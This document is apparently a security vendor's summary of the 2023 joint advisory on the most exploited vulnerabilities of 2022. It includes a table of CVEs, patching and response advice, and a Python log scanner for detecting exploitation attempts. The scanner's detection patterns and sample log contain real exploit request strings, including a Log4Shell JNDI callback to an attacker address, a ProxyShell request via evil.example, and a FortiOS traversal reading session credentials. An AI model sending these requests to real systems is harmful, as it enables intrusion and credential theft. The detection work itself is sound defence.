Take steps to reduce the risk of compromise by malicious actors still exploiting these vulnerabilities.
Released August 3, 2023 – Alert Code AA23-215A
Five Eyes cybersecurity authorities, including the FBI, CISA, and the NSA, have released a list of the 12 most exploited vulnerabilities of 2022.
Organizations worldwide are urged to remediate these flaws and to deploy patch management so that the window for attack is reduced. Threat actors concentrated on older, long-patched vulnerabilities rather than recently disclosed ones, targeting systems left unpatched and exposed to the internet.
The joint advisory notes that proof-of-concept code was publicly available for many of these vulnerabilities, which likely facilitated exploitation by a broader range of malicious cyber actors. Although the Common Vulnerabilities and Exposures (CVE) Program published more than 25,000 new vulnerabilities in 2022, only five of those made the top-12 list; the other seven were disclosed in 2018 or 2021.
Below is the list of the 12 most exploited security flaws last year; each CVE identifier corresponds to a National Vulnerability Database entry.
| CVE | Vendor | Product | Type |
|---|---|---|---|
| CVE-2018-13379 | Fortinet | FortiOS and FortiProxy | SSL VPN credential exposure |
| CVE-2021-34473 (ProxyShell) | Microsoft | Exchange Server | RCE |
| CVE-2021-31207 (ProxyShell) | Microsoft | Exchange Server | Security Feature Bypass |
| CVE-2021-34523 (ProxyShell) | Microsoft | Exchange Server | Elevation of Privilege |
| CVE-2021-40539 | Zoho | ADSelfService Plus | RCE/Auth Bypass |
| CVE-2021-26084 | Atlassian | Confluence Server/Data Center | Arbitrary code execution |
| CVE-2021-44228 (Log4Shell) | Apache | Log4j2 | RCE |
| CVE-2022-22954 | VMware | Workspace ONE | RCE |
| CVE-2022-22960 | VMware | Workspace ONE | Improper Privilege Management |
| CVE-2022-1388 | F5 Networks | BIG-IP | Missing Authentication |
| CVE-2022-30190 | Microsoft | Multiple Products | RCE |
| CVE-2022-26134 | Atlassian | Confluence Server/Data Center | RCE |
The first spot goes to CVE-2018-13379, a path traversal in the Fortinet SSL VPN web portal that lets an unauthenticated attacker read files from the device, including the session file that holds plaintext credentials. Fortinet fixed it in May 2019, four years before this advisory. The bug was abused by state-sponsored actors to breach U.S. government election support systems.
"Organizations continue using unpatched software and systems, leaving easily discovered openings for cyber actors to target," warned Neal Ziring, the Technical Director for NSA's Cybersecurity Directorate.
"Older vulnerabilities can provide low-cost and high impact means for these actors to access sensitive data."
Relevance
IT Infrastructure Security
Recommendations
Apply timely patches to systems.
Check for signs of compromise if any CVE identified in this CSA has not been patched.
Implement a centralized patch management system.
Maintain and update a cybersecurity incident response plan, and test it at least annually.
Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
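As an added example for the "check for signs of compromise" recommendation (this script is not part of the advisory and is not CISA's tooling), the following Python scans web-server access logs in the common "combined" format for the publicly documented request-side exploitation patterns of four of the listed CVEs: a Log4Shell JNDI lookup (including the `${lower:j}` and `${::-j}` obfuscations attackers use to evade naive greps), the ProxyShell Autodiscover path-confusion request, the FortiOS SSL VPN `fgt_lang` path traversal, and an OGNL expression in a Confluence URI path. Every log line, IP address and host name in `SAMPLE_LOG` is constructed for illustration.

```python
"""Scan combined-format web access logs for request patterns tied to four of
the CVEs in AA23-215A.  Added example for this article, not CISA's tooling;
every log line, address and host name below is constructed."""
import re
import urllib.parse
from typing import Dict, List

# Apache/nginx "combined" format:
# client ident user [time] "METHOD URI PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookup wrappers used to hide the literal "jndi": ${lower:j}, ${upper:N},
# ${::-d}, ${env:NOPE:-i}.  Each resolves to its inner text at lookup time.
LOG4J_WRAPPER_RE = re.compile(r"\$\{(?:lower:|upper:|::-|env:[^:}]*:-)([^${}]*)\}", re.I)

# (cve, description, pattern, request fields to inspect).  Patterns are the widely
# published request-side indicators, applied after percent-decoding.
SIGNATURES = [
    ("CVE-2021-44228", "Log4Shell JNDI lookup",
     re.compile(r"\$\{\s*jndi\s*:", re.I), ("uri", "referer", "ua")),
    ("CVE-2021-34473", "ProxyShell Autodiscover path confusion",
     re.compile(r"/autodiscover/autodiscover\.json\?.*@", re.I), ("uri",)),
    ("CVE-2018-13379", "FortiOS SSL VPN fgt_lang path traversal",
     re.compile(r"/remote/fgt_lang\?lang=.*(?:\.\./|sslvpn_websession)", re.I), ("uri",)),
    ("CVE-2022-26134", "Confluence OGNL expression in URI path",
     re.compile(r"^/\$\{.*\}"), ("uri",)),
]


def decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable; attackers double-encode to dodge naive greps."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def unwrap_log4j(text: str, rounds: int = 10) -> str:
    """Resolve nested lookup wrappers so obfuscated payloads normalise to ${jndi:...}."""
    for _ in range(rounds):
        resolved = LOG4J_WRAPPER_RE.sub(r"\1", text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line: str) -> List[Dict[str, str]]:
    """Return one hit per matching CVE for a single log line ([] if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    fields = {name: decode(m.group(name)) for name in ("uri", "referer", "ua")}
    hits = []
    for cve, desc, pattern, scope in SIGNATURES:
        for name in scope:
            text = fields[name]
            if cve == "CVE-2021-44228":
                text = unwrap_log4j(text)
            if pattern.search(text):
                hits.append({"client": m.group("client"), "status": m.group("status"),
                             "cve": cve, "field": name, "detail": desc})
                break  # one hit per CVE per line is enough for triage
    return hits


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan a whole log, tagging each hit with its 1-based line number."""
    hits = []
    for number, line in enumerate(lines, 1):
        for hit in scan_line(line.rstrip("\n")):
            hit["line"] = str(number)
            hits.append(hit)
    return hits


# Constructed sample log: one benign request, five exploitation attempts, one
# benign request containing a "$" to show the signatures are not just grepping "$".
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Aug/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Aug/2023:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [02/Aug/2023:10:00:03 +0000] "GET /login?user=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.5%2Fx%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.9 - - [02/Aug/2023:10:00:04 +0000] "GET /autodiscover/autodiscover.json?@evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example HTTP/1.1" 200 8821 "-" "python-requests/2.31"',
    '203.0.113.9 - - [02/Aug/2023:10:00:05 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [02/Aug/2023:10:00:06 +0000] "GET /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Aug/2023:10:00:07 +0000] "GET /search?q=price%24100 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['cve']} via {hit['field']} "
              f"(HTTP {hit['status']}) - {hit['detail']}")
```

A hit is a lead, not a verdict. The HTTP status matters: a 200 to the FortiOS traversal request means the device most likely served the session file, while a 404 or a request blocked upstream is much lower confidence. Payloads carried in POST bodies, or in headers the log does not record, will not appear here at all, so a clean scan is not proof of absence. Treat a match as the trigger for the vendor's own indicator-of-compromise guidance and for the incident response steps below.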
Incident Response
Isolate and quarantine any compromised systems.
Notify relevant parties according to your Incident Response Plan.
Reach out to cybersecurity professionals to help contain the attack, analyze the risk, and devise a recovery plan.
References
1. BleepingComputer. (2023, August 3). FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022. https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/
2. CISA. (2023, August 3). 2022 Top Routinely Exploited Vulnerabilities (AA23-215A). https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
How can CyberForce|Q services help you address this risk?
Partner with CyberForce|Q: our cybersecurity experts can assist with writing and implementing a patch management program for your organization. Our Incident Response team can also work with you to develop, implement, and test your incident response plan; customized tabletop exercises are encouraged for all organizations. Our Security Operations Center is purpose-built to monitor your systems 24x7x365. By leveraging these services, we can help minimize your IT infrastructure security risk with measurable results.
Learn more about CyberForce|Q.
Learn more about our Q|FRAME Assessment Services.